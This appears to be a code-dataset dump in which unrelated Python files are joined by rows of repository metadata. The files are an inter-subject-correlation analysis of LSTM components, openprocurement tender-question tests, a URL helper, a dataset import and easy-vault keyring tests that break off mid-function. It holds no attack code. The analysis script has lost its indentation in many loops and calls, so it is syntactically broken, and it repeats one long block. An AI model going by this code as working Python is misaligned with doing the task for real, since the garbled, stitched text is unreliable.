n_pairs = n_players * (n_players - 1) // 2  # 6 unordered player pairs

iscs = np.full((n_matchups, n_repeats, n_pairs, k), np.nan)
for matchup in np.arange(n_matchups):
    for repeat in np.arange(n_repeats):
        # Move the player axis last, as expected by brainiak's isc()
        lstms_rep = np.moveaxis(lstms_pca_reg[matchup, repeat], 0, 2)
        iscs[matchup, repeat] = isc(lstms_rep, pairwise=True)
        # Bug fix: added the missing space so the implicitly concatenated
        # message no longer reads "...ISC formatchup 0 repeat 0".
        print("Finished computing ISC for "
              f"matchup {matchup} repeat {repeat}")

np.save(f'results/iscs_tanh-z_pca-k{k}_reg-{reg}.npy', iscs)
# Plot cooperative/competitive ISC for top 10 PCs
matchup = 0
n_repeats = 8
pcs = np.arange(10)
sns.set_context('notebook', font_scale=1.2)
fig, axs = plt.subplots(2, 5, figsize=(25, 8))
for pc, ax in zip(pcs, axs.ravel()):
corr = fisher_mean([np.corrcoef(lstms_pca_reg[matchup, r, ..., pc])
for r in np.arange(n_repeats)], axis=0)
sns.heatmap(corr, square=True, annot=True, vmin=-1, vmax=1,
cmap='RdBu_r', xticklabels=False, yticklabels=False,
fmt='.2f', ax=ax)
ax.set_title(f'PC{pc + 1}')
plt.savefig(f'figures/isc_coop-comp_tanh-z_pca-k{k}_reg-{reg}_m{matchup}.png',
dpi=300, bbox_inches='tight')
# Compute differences between cooperative and competitive ISCs
matchup = 0
n_repeats = 8
n_pcs = 100
isc_diffs, isc_coops = [], []
isc_diffs_df = {'difference': [], 'PC': [], 'repeat': []}
for pc in np.arange(n_pcs):
corrs = [np.corrcoef(lstms_pca_reg[matchup, r, ..., pc])
for r in np.arange(n_repeats)]
coops = [np.mean(c[[0, 3], [1, 2]]) for c in corrs]
diffs = [np.mean(c[[0, 3], [1, 2]]) - np.mean(c[0:2, 2:4])
for c in corrs]
isc_coops.append(coops)
isc_diffs.append(diffs)
isc_pc_diffs = []
for r, diff in enumerate(diffs):
isc_diffs_df['difference'].append(diff)
isc_diffs_df['PC'].append(pc + 1)
isc_diffs_df['repeat'].append(r)
isc_pc_diffs.append(diff)
isc_diffs_df = pd.DataFrame(isc_diffs_df)
isc_coops = np.array(isc_coops).T
isc_diffs = np.array(isc_diffs).T
# Get PCs with largest difference between cooperative/competitive
n_top = 10
isc_diff_means = fisher_mean(isc_diffs, axis=0)
top_diffs = np.argpartition(isc_diff_means, -n_top)[-n_top:]
top_diffs = top_diffs[np.argsort(isc_diff_means[top_diffs])[::-1]]
# Get PCs with largest cooperative ISC (irrespective of competitive ISC)
n_top = 10
isc_coop_means = fisher_mean(isc_coops, axis=0)
top_coops = np.argpartition(isc_coop_means, -n_top)[-n_top:]
top_coops = top_coops[np.argsort(isc_coop_means[top_coops])[::-1]]
# Find overlap between top PCs
top_both = list(set(top_diffs) & set(top_coops))
# For matchup 0: [2, 7, 9, 23, 24]
# Bootstrap test for significance of difference
observed, ci, p, distribution = bootstrap_test(isc_diffs,
bootstrap_axis=0,
n_bootstraps=1000,
estimator=fisher_mean,
ci_percentile=95,
side='two-sided')
# FDR correction of p-values
_, fdr_p, _, _ = multipletests(p, method='fdr_bh')
# Plot ISCs for 100 PCs with significance markers
sig_pos = ((fdr_p < .05) & (observed > 0)).nonzero()[0]
sig_neg = ((fdr_p < .05) & (observed < 0)).nonzero()[0]
sns.set_context('notebook', font_scale=1.2)
fig, ax = plt.subplots(figsize=(16, 4))
sns.barplot(x='PC', y='difference', data=isc_diffs_df, ax=ax, color='.6',
estimator=fisher_mean)
#ax.set_ylim(-.375, .325) # for matchup = 3
ax.set_ylim(-.3, 1) # for matchup = 0
ax.set_xticks([0, 19, 39, 59, 79, 99])
for sig_pc in sig_pos:
ax.annotate('.', (sig_pc, -.02), color='tab:red', size=40,
xycoords=('data', 'axes fraction'),
ha='center', va='bottom')
for sig_pc in sig_neg:
ax.annotate('.', (sig_pc, -.02), color='tab:blue', size=40,
xycoords=('data', 'axes fraction'),
ha='center', va='bottom')
ax.set_ylabel('cooperative – competitive ISC')
ax.set_title(f'difference in cooperative vs. competitive ISC for 100 PCs');
sns.despine()
plt.savefig('figures/isc_diff-bars_tanh-z_'
f'pca-k{k}_reg-{reg}_m{matchup}.png',
dpi=300, bbox_inches='tight')
# Zoom in and replot to highlight top PCs
from matplotlib.patches import Patch
colors = np.array(['.7'] * k, dtype='object')
colors[top_coops] = 'tab:red'
colors[top_diffs] = 'tab:blue'
colors[top_both] = 'tab:purple'
np.save('figures/colors_top-bars_tanh-z_'
f'pca-k{k}_reg-{reg}_m{matchup}.npy', colors)
sns.set_context('notebook', font_scale=1.2)
fig, ax = plt.subplots(figsize=(16, 4))
sns.barplot(x='PC', y='difference', data=isc_diffs_df, ax=ax, color='.6',
estimator=fisher_mean, palette=colors)
#ax.set_ylim(-.375, .325) # for matchup = 3
ax.set_ylim(-.05, .4) # for matchup = 0
ax.set_xticks([0, 19, 39, 59, 79, 99])
ax.set_ylabel('cooperative – competitive ISC')
ax.set_title(f'difference in cooperative vs. competitive ISC for 100 PCs')
sns.despine()
legend_elements = [Patch(facecolor='tab:red'),
Patch(facecolor='tab:blue'),
Patch(facecolor='tab:purple'),
Patch(facecolor='tab:purple')]
ax.legend(handles=legend_elements, loc='upper right',
labels=['', '', 'top 10 cooperative PCs',
'top 10 difference PCs'],
ncol=2, handletextpad=0.5, handlelength=1.0, columnspacing=-0.5)
plt.savefig('figures/isc_top-bars_tanh-z_'
f'pca-k{k}_reg-{reg}_m{matchup}.png',
dpi=300, bbox_inches='tight')
# Plot cooperative/competitive ISC for top 10 PCs
matchup = 0
n_repeats = 8
pcs = top_both
fig, axs = plt.subplots(1, 5, figsize=(18, 8))
for pc, ax in zip(pcs, axs.ravel()):
corr = fisher_mean([np.corrcoef(lstms_pca_reg[matchup, r, ..., pc])
for r in np.arange(n_repeats)], axis=0)
sns.heatmap(corr, square=True, annot=True, vmin=-1, vmax=1,
cmap='RdBu_r', xticklabels=False, yticklabels=False,
fmt='.2f', ax=ax, cbar_kws={'shrink': .32})
ax.set_title(f'PC{pc + 1}')
plt.savefig(f'figures/isc_top-coop_tanh-z_pca-k{k}_reg-{reg}_m{matchup}.png',
dpi=300, bbox_inches='tight')
# Lagged ISC for selected PCs
matchup = 0
n_repeats = 8
n_lags = 900
pc_ids = np.arange(10)
# Compute lagged ISC for each repeat
lagged_iscs = []
for repeat in np.arange(n_repeats):
# Slicing with array seems to shift axis?
lstms_rep = np.moveaxis(lstms_pca[matchup, repeat, ..., pc_ids], 2, 0)
lagged_rep, lags = lagged_isc(lstms_rep, n_lags=n_lags, circular=True)
lagged_iscs.append(lagged_rep)
print(f"Finished computing lagged ISC for repeat {repeat}")
lagged_iscs = np.stack(lagged_iscs, axis=0)
# Get lagged ISCs for cooperative vs. competitive pairs. With 4 players,
# pairwise ISC yields 6 pairs; indices 0 and 5 are the within-team
# (cooperative) pairs and 1-4 are the across-team (competitive) pairs.
coop_ids, comp_ids = [0, 5], [1, 2, 3, 4]
lagged_coop = np.mean(lagged_iscs[:, coop_ids, ...], axis=1)
# Bug fix: the competitive average previously indexed with coop_ids, so
# lagged_comp was a duplicate of lagged_coop; use comp_ids as intended.
lagged_comp = np.mean(lagged_iscs[:, comp_ids, ...], axis=1)
# Bootstrap test to assess significance
observed, ci, ps, distribution = bootstrap_test(lagged_coop,
bootstrap_axis=0,
n_bootstraps=1000,
estimator=fisher_mean,
ci_percentile=95,
side='right')
# FDR correction across lags
fdr_ps = []
for p in ps:
_, fdr_p, _, _ = multipletests(p, method='fdr_bh')
fdr_ps.append(fdr_p)
fdr_ps = np.array(fdr_ps)
# Plot lagged ISC with significance indicator
n_rows, n_cols = 5, 2
fig, axs = plt.subplots(n_rows, n_cols, figsize=(9, 8))
pc_ids = np.arange(10)
threshold = .02
for i, (pc_id, ax) in enumerate(zip(pc_ids, axs.ravel())):
    # Bug fix: sig_ids was previously computed once before the loop using
    # the (not-yet-defined) loop variable pc_id, raising NameError on a
    # fresh run; compute it per PC inside the loop instead.
    sig_ids = (fdr_ps[pc_id] <= threshold).nonzero()[0]
    # Individual cooperative pair traces in light gray behind the mean
    ax.plot(lags, np.concatenate(lagged_iscs[:, coop_ids, pc_id]).T,
            color='.8', alpha=.5, zorder=1)
    ax.plot(lags, np.mean(lagged_coop[:, pc_id, :], axis=0),
            color='.4', zorder=2)
    if i not in [8, 9]:
        ax.xaxis.set_ticks([])
    else:
        # Convert lag samples to seconds (assumes 15 samples per second
        # — TODO confirm the sampling rate against data collection code)
        ax.set_xticks(lags[::15 * 10])
        ax.set_xticklabels(np.unique(lags // 15)[::10])
        ax.set_xlabel('lag (seconds)')
    if i % 2 != 0:
        ax.yaxis.set_ticks([])
    ax.set_ylim(-.3, .7)
    ax.set_xlim(-n_lags, n_lags)
    ax.set_title(f'PC{pc_id + 1} cooperative ISC',
                 loc='left', va='top', x=.02, y=.95)
sns.despine()
plt.tight_layout()
plt.savefig('figures/isc_lag-60s_tanh-z_'
            f'pca-k{k}_m{matchup}.png',
            dpi=300, bbox_inches='tight')
# plt.scatter(lags[sig_ids], np.mean(lagged_coop[:, pc_id], axis=0)[sig_ids],
#             color='tab:red', marker='.', zorder=3)
# Load in PCA-reduced LSTMs with confounds regressed out
reg = 'com' # 'pre', 'hud', 'act', or 'com'
lstms_pca_reg = np.load(f'results/lstms_tanh-z_pca-k{k}_reg-{reg}.npy')
# Lagged ISC for selected PCs
matchup = 0
n_repeats = 8
n_lags = 900
pc_ids = np.arange(10)
# Compute lagged ISC for each repeat
lagged_iscs = []
for repeat in np.arange(n_repeats):
# Slicing with array seems to shift axis?
lstms_rep = np.moveaxis(lstms_pca_reg[matchup, repeat, ..., pc_ids], 2, 0)
lagged_rep, lags = lagged_isc(lstms_rep, n_lags=n_lags, circular=True)
lagged_iscs.append(lagged_rep)
print(f"Finished computing lagged ISC for repeat {repeat}")
lagged_iscs = np.stack(lagged_iscs, axis=0)
# Get lagged ISCs for cooperative vs. competitive pairs. With 4 players,
# pairwise ISC yields 6 pairs; indices 0 and 5 are the within-team
# (cooperative) pairs and 1-4 are the across-team (competitive) pairs.
coop_ids, comp_ids = [0, 5], [1, 2, 3, 4]
lagged_coop = np.mean(lagged_iscs[:, coop_ids, ...], axis=1)
# Bug fix: the competitive average previously indexed with coop_ids, so
# lagged_comp was a duplicate of lagged_coop; use comp_ids as intended.
lagged_comp = np.mean(lagged_iscs[:, comp_ids, ...], axis=1)
# Bootstrap test to assess significance
observed, ci, ps, distribution = bootstrap_test(lagged_coop,
bootstrap_axis=0,
n_bootstraps=1000,
estimator=fisher_mean,
ci_percentile=95,
side='right')
# FDR correction across lags
fdr_ps = []
for p in ps:
_, fdr_p, _, _ = multipletests(p, method='fdr_bh')
fdr_ps.append(fdr_p)
fdr_ps = np.array(fdr_ps)
# Plot lagged ISC with significance indicator
n_rows, n_cols = 5, 2
fig, axs = plt.subplots(n_rows, n_cols, figsize=(9, 8))
pc_ids = np.arange(10)
threshold = .02
for i, (pc_id, ax) in enumerate(zip(pc_ids, axs.ravel())):
    # Bug fix: sig_ids was previously computed once before the loop using
    # the (not-yet-defined) loop variable pc_id, raising NameError on a
    # fresh run; compute it per PC inside the loop instead.
    sig_ids = (fdr_ps[pc_id] <= threshold).nonzero()[0]
    # Individual cooperative pair traces in light gray behind the mean
    ax.plot(lags, np.concatenate(lagged_iscs[:, coop_ids, pc_id]).T,
            color='.8', alpha=.5, zorder=1)
    ax.plot(lags, np.mean(lagged_coop[:, pc_id, :], axis=0),
            color='.4', zorder=2)
    if i not in [8, 9]:
        ax.xaxis.set_ticks([])
    else:
        # Convert lag samples to seconds (assumes 15 samples per second
        # — TODO confirm the sampling rate against data collection code)
        ax.set_xticks(lags[::15 * 10])
        ax.set_xticklabels(np.unique(lags // 15)[::10])
        ax.set_xlabel('lag (seconds)')
    if i % 2 != 0:
        ax.yaxis.set_ticks([])
    ax.set_ylim(-.3, .7)
    ax.set_xlim(-n_lags, n_lags)
    ax.set_title(f'PC{pc_id + 1} cooperative ISC',
                 loc='left', va='top', x=.02, y=.95)
sns.despine()
plt.tight_layout()
plt.savefig('figures/isc_lag-60s_tanh-z_'
            f'pca-k{k}_reg-{reg}_m{matchup}.png',
            dpi=300, bbox_inches='tight')
# plt.scatter(lags[sig_ids], np.mean(lagged_coop[:, pc_id], axis=0)[sig_ids],
#             color='tab:red', marker='.', zorder=3)
| 37.70024 | 78 | 0.61561 | 2,403 | 15,721 | 3.84561 | 0.117769 | 0.016232 | 0.016232 | 0.015475 | 0.856725 | 0.853804 | 0.846878 | 0.828806 | 0.822963 | 0.815821 | 0 | 0.035207 | 0.233955 | 15,721 | 416 | 79 | 37.790865 | 0.731877 | 0.126264 | 0 | 0.807571 | 0 | 0.006309 | 0.137679 | 0.052397 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.028391 | 0 | 0.028391 | 0.012618 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b41637c43f467ec652247da08a951f9811808630 | 4,806 | py | Python | openprocurement/tender/openua/tests/question_blanks.py | raccoongang/openprocurement.tender.openua | dd2dbddf317bdb4bb38443240faf126765ef48c4 | [
"Apache-2.0"
] | 8 | 2016-01-28T11:37:09.000Z | 2019-03-17T07:18:09.000Z | openprocurement/tender/openua/tests/question_blanks.py | raccoongang/openprocurement.tender.openua | dd2dbddf317bdb4bb38443240faf126765ef48c4 | [
"Apache-2.0"
] | 70 | 2016-02-11T16:46:22.000Z | 2018-03-19T15:42:16.000Z | openprocurement/tender/openua/tests/question_blanks.py | raccoongang/openprocurement.tender.openua | dd2dbddf317bdb4bb38443240faf126765ef48c4 | [
"Apache-2.0"
] | 30 | 2016-01-27T10:51:00.000Z | 2019-03-31T15:56:52.000Z | # -*- coding: utf-8 -*-
from openprocurement.tender.belowthreshold.tests.base import (
test_organization
)
# TenderQuestionResourceTest
def create_tender_question(self):
    """Posting a question succeeds in enquiryPeriod and is rejected after."""
    url = '/tenders/{}/questions'.format(self.tender_id)
    question_data = {'data': {'title': 'question title',
                              'description': 'question description',
                              'author': test_organization}}

    # Within the enquiry period the question is created.
    response = self.app.post_json(url, question_data)
    self.assertEqual(response.status, '201 Created')
    self.assertEqual(response.content_type, 'application/json')
    question = response.json['data']
    self.assertEqual(question['author']['name'], test_organization['name'])
    self.assertIn('id', question)
    self.assertIn(question['id'], response.headers['Location'])

    # After the enquiry period ends, creation is forbidden.
    self.go_to_enquiryPeriod_end()
    response = self.app.post_json(url, question_data, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"],
                     "Can add question only in enquiryPeriod")

    # Likewise once the tender has moved to the auction stage.
    self.set_status('active.auction')
    response = self.app.post_json(url, question_data, status=403)
    self.assertEqual(response.status, '403 Forbidden')
    self.assertEqual(response.content_type, 'application/json')
    self.assertEqual(response.json['errors'][0]["description"],
                     "Can add question only in enquiryPeriod")
# TenderLotQuestionResourceTest
def tender_has_unanswered_questions(self):
question_id = self.create_question_for("tender", self.tender_id)
self.set_status('active.auction', {'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.tendering')
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(self.tender_id, self.tender_token), {'data': {
'reason': 'cancellation reason',
'status': 'active',
}})
self.assertEqual(response.status, '201 Created')
response = self.app.get('/tenders/{}'.format(self.tender_id))
self.assertEqual(response.json['data']['status'], 'cancelled')
def lot_has_unanswered_questions(self):
question_id = self.create_question_for("lot", self.initial_lots[0]['id'])
self.set_status('active.auction', {'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.tendering')
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(self.tender_id, self.tender_token), {'data': {
'reason': 'cancellation reason',
'status': 'active',
"cancellationOf": "lot",
"relatedLot": self.initial_lots[0]['id']
}})
self.assertEqual(response.status, '201 Created')
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
self.assertEqual(response.json['data']['status'], 'unsuccessful')
def item_has_unanswered_questions(self):
items = self.app.get('/tenders/{}'.format(self.tender_id)).json['data']['items']
question_id = self.create_question_for("item", items[0]['id'])
self.set_status('active.auction', {'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.tendering')
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(self.tender_id, self.tender_token), {'data': {
'reason': 'cancellation reason',
'status': 'active',
"cancellationOf": "lot",
"relatedLot": self.initial_lots[0]['id']
}})
self.assertEqual(response.status, '201 Created')
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
self.assertEqual(response.json['data']['status'], 'unsuccessful')
| 46.211538 | 128 | 0.672701 | 539 | 4,806 | 5.860853 | 0.148423 | 0.069642 | 0.072175 | 0.074074 | 0.860399 | 0.852168 | 0.825261 | 0.797404 | 0.779044 | 0.763533 | 0 | 0.007456 | 0.134831 | 4,806 | 103 | 129 | 46.660194 | 0.752285 | 0.01623 | 0 | 0.74359 | 0 | 0 | 0.276249 | 0.037468 | 0 | 0 | 0 | 0 | 0.25641 | 1 | 0.051282 | false | 0 | 0.012821 | 0 | 0.064103 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b4410cca60d3849e5e6ff1af55ba8fd0dfda0bdc | 236 | py | Python | article/helpers.py | uktrade/directory-ui-export-readiness | 6a82178b866f6afb06a9e8d0f961989fa51195c6 | [
"MIT"
] | 1 | 2019-01-15T16:53:03.000Z | 2019-01-15T16:53:03.000Z | article/helpers.py | uktrade/directory-ui-export-readiness | 6a82178b866f6afb06a9e8d0f961989fa51195c6 | [
"MIT"
] | 537 | 2017-10-19T13:23:10.000Z | 2019-02-14T09:30:44.000Z | article/helpers.py | uktrade/directory-ui-export-readiness | 6a82178b866f6afb06a9e8d0f961989fa51195c6 | [
"MIT"
] | 3 | 2017-10-26T17:34:50.000Z | 2018-01-04T16:44:58.000Z |
def prefix_international_news_url(path):
return path.replace(
'/international/eu-exit-news/',
'/international/international-eu-exit-news/', 1)
def unslugify(slug):
return (slug.replace('-', ' ')).capitalize()
| 23.6 | 56 | 0.661017 | 26 | 236 | 5.884615 | 0.538462 | 0.196078 | 0.248366 | 0.300654 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005102 | 0.169492 | 236 | 9 | 57 | 26.222222 | 0.77551 | 0 | 0 | 0 | 0 | 0 | 0.306383 | 0.297872 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
6f01056c3a8c4c964b5eeb601acdbf9ebddc2112 | 85 | py | Python | reinforcement/datasets/mr/__init__.py | hoxmark/Deep_reinforcement_active_learning | 7458916d6f75c7fbfcfd4bc81763ab5ba16208ad | [
"MIT"
] | 19 | 2018-03-19T12:08:18.000Z | 2021-08-14T09:12:33.000Z | reinforcement/datasets/mr/__init__.py | hoxmark/TDT4501-Specialization-Project | 7458916d6f75c7fbfcfd4bc81763ab5ba16208ad | [
"MIT"
] | 20 | 2020-01-28T22:14:40.000Z | 2022-03-11T23:17:48.000Z | reinforcement/datasets/mr/__init__.py | hoxmark/Deep_reinforcement_active_learning | 7458916d6f75c7fbfcfd4bc81763ab5ba16208ad | [
"MIT"
] | 6 | 2018-07-25T08:07:45.000Z | 2021-08-14T09:12:34.000Z | from datasets.mr.model import CNN as model
from datasets.mr.dataset import load_data
| 28.333333 | 42 | 0.835294 | 15 | 85 | 4.666667 | 0.666667 | 0.342857 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 85 | 2 | 43 | 42.5 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6f0b146e3d0b7205e941991d2ebea63fbc7665fe | 11,735 | py | Python | tests/unittest/test_keyring.py | andy-maier/easy-vault | cf9fd948ecabb3c1342ed8adb3a80d56e6d977d3 | [
"Apache-2.0"
] | 1 | 2021-03-29T22:10:04.000Z | 2021-03-29T22:10:04.000Z | tests/unittest/test_keyring.py | andy-maier/easy-vault | cf9fd948ecabb3c1342ed8adb3a80d56e6d977d3 | [
"Apache-2.0"
] | 61 | 2021-03-28T20:15:12.000Z | 2021-12-06T16:35:46.000Z | tests/unittest/test_keyring.py | andy-maier/easy-vault | cf9fd948ecabb3c1342ed8adb3a80d56e6d977d3 | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test the _keyring.py module.
"""
from __future__ import absolute_import, print_function
try:
from unittest import mock
except ImportError:
import mock
import pytest
import keyring
from easy_vault import Keyring, KeyringNotAvailable, KeyringError
from easy_vault._keyring import NO_KEYRING_EXCEPTION
# pylint: disable=unused-import
from ..utils.keyring_utils import keyring_filepath # noqa: F401
from ..utils.keyring_utils import is_keyring_available
@pytest.mark.skipif(
    not is_keyring_available(), reason="No keyring service available")
# pylint: disable=redefined-outer-name
def test_keyring_get_set_delete(keyring_filepath):
    """
    Test function for Keyring.get_password() / set_password() /
    delete_password()
    """
    kr = Keyring()
    password = 'mypassword'

    # Initially no password is stored for the file.
    assert kr.get_password(keyring_filepath) is None
    assert kr.delete_password(keyring_filepath) is False

    # Store the password and verify the round trip.
    kr.set_password(keyring_filepath, password)
    assert kr.get_password(keyring_filepath) == password

    # Deleting reports it existed; a second delete reports it did not.
    assert kr.delete_password(keyring_filepath) is True
    assert kr.delete_password(keyring_filepath) is False
def test_keyring_available():
    """
    Test function for Keyring.is_available()
    """
    kr = Keyring()

    # Code to be tested
    is_avail = kr.is_available()
    assert isinstance(is_avail, bool)

    try:
        # Code to be tested
        kr.check_available()
        check_avail = True
    except Exception as exc:  # pylint: disable=broad-except
        assert isinstance(exc, KeyringNotAvailable)
        check_avail = False

    # check_available() must agree with is_available().
    assert check_avail == is_avail
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
"keyring_exc, exp_exc",
[
(NO_KEYRING_EXCEPTION, KeyringNotAvailable),
(keyring.errors.KeyringError, KeyringError),
]
)
# pylint: disable=redefined-outer-name
def test_keyring_get_password_fail(keyring_filepath, keyring_exc, exp_exc):
"""
Test function for Keyring.get_password() when it raises an exception
"""
kr = Keyring()
with mock.patch.object(keyring, 'get_password', side_effect=keyring_exc):
with pytest.raises(exp_exc):
# Code to be tested
kr.get_password(keyring_filepath)
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
"keyring_exc, exp_exc",
[
(NO_KEYRING_EXCEPTION, KeyringNotAvailable),
(keyring.errors.KeyringError, KeyringError),
]
)
# pylint: disable=redefined-outer-name
def test_keyring_set_password_fail(keyring_filepath, keyring_exc, exp_exc):
"""
Test function for Keyring.set_password() when it raises an exception
"""
kr = Keyring()
with mock.patch.object(keyring, 'set_password', side_effect=keyring_exc):
with pytest.raises(exp_exc):
# Code to be tested
kr.set_password(keyring_filepath, 'dummy')
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
"keyring_exc, exp_exc",
[
(NO_KEYRING_EXCEPTION, KeyringNotAvailable),
(keyring.errors.KeyringError, KeyringError),
]
)
# pylint: disable=redefined-outer-name
def test_keyring_delete_password_fail1(keyring_filepath, keyring_exc, exp_exc):
"""
Test function for Keyring.delete_password() when it raises an exception
in keyring.get_password().
"""
kr = Keyring()
with mock.patch.object(keyring, 'get_password', side_effect=keyring_exc):
with pytest.raises(exp_exc):
# Code to be tested
kr.delete_password(keyring_filepath)
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
"keyring_exc, exp_exc",
[
(NO_KEYRING_EXCEPTION, KeyringNotAvailable),
(keyring.errors.KeyringError, KeyringError),
]
)
# pylint: disable=redefined-outer-name
def test_keyring_delete_password_fail2(keyring_filepath, keyring_exc, exp_exc):
"""
Test function for Keyring.delete_password() when it raises an exception
in keyring.delete_password().
"""
kr = Keyring()
kr.set_password(keyring_filepath, 'dummy')
with mock.patch.object(keyring, 'delete_password', side_effect=keyring_exc):
with pytest.raises(exp_exc):
# Code to be tested
kr.delete_password(keyring_filepath)
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
"keyring_exc, exp_result",
[
(NO_KEYRING_EXCEPTION, False),
(keyring.errors.KeyringError, KeyringError),
]
)
def test_keyring_is_available_fail1(keyring_exc, exp_result):
"""
Test function for Keyring.is_available() when it raises an exception
in keyring.set_password().
"""
kr = Keyring()
with mock.patch.object(keyring, 'set_password', side_effect=keyring_exc):
if isinstance(exp_result, type) and issubclass(exp_result, Exception):
with pytest.raises(exp_result):
# Code to be tested
kr.is_available()
else:
# Code to be tested
available = kr.is_available()
assert available == exp_result
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
"keyring_exc",
[
(NO_KEYRING_EXCEPTION),
(keyring.errors.KeyringError),
]
)
def test_keyring_is_available_fail2(keyring_exc):
"""
Test function for Keyring.is_available() when it raises an exception
in keyring.delete_password().
"""
kr = Keyring()
with mock.patch.object(
keyring, 'delete_password', side_effect=keyring_exc):
# Code to be tested
available = kr.is_available()
assert available is False
@pytest.mark.skipif(
not is_keyring_available(), reason="No keyring service available")
def test_keyring_is_available_fail3():
"""
Test function for Keyring.is_available() when the backend is the Chainer
backend with an empty list of backends.
"""
kr = Keyring()
backend_class = keyring.backends.chainer.ChainerBackend
with mock.patch.object(
keyring, 'get_keyring', return_value=backend_class()):
with mock.patch.object(
backend_class, 'backends',
new_callable=mock.PropertyMock) as backends_mock:
backends_mock.return_value = []
# Code to be tested
available = kr.is_available()
assert available is False
@pytest.mark.skipif(
    not is_keyring_available(), reason="No keyring service available")
def test_keyring_is_available_fail4():
    """
    Keyring.is_available() returns False when the active backend is the
    fail backend.
    """
    keyring_obj = Keyring()
    fail_cls = keyring.backends.fail.Keyring
    with mock.patch.object(keyring, 'get_keyring', return_value=fail_cls()):
        # Code to be tested
        assert keyring_obj.is_available() is False
@pytest.mark.skipif(
    not is_keyring_available(), reason="No keyring service available")
def test_keyring_is_available_fail5():
    """
    Keyring.is_available() returns False when the active backend is the
    null backend.
    """
    keyring_obj = Keyring()
    null_cls = keyring.backends.null.Keyring
    with mock.patch.object(keyring, 'get_keyring', return_value=null_cls()):
        # Code to be tested
        assert keyring_obj.is_available() is False
@pytest.mark.skipif(
    not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
    "keyring_exc, exp_exc",
    [
        (NO_KEYRING_EXCEPTION, KeyringNotAvailable),
        (keyring.errors.KeyringError, KeyringError),
    ]
)
def test_keyring_check_available_fail1(keyring_exc, exp_exc):
    """
    Keyring.check_available() raises the expected exception when
    keyring.set_password() fails.
    """
    keyring_obj = Keyring()
    with mock.patch.object(
            keyring, 'set_password', side_effect=keyring_exc), \
            pytest.raises(exp_exc):
        # Code to be tested
        keyring_obj.check_available()
@pytest.mark.skipif(
    not is_keyring_available(), reason="No keyring service available")
@pytest.mark.parametrize(
    "keyring_exc",
    [
        (NO_KEYRING_EXCEPTION),
        (keyring.errors.KeyringError),
    ]
)
def test_keyring_check_available_fail2(keyring_exc):
    """
    Keyring.check_available() raises KeyringNotAvailable when
    keyring.delete_password() fails.
    """
    keyring_obj = Keyring()
    with mock.patch.object(
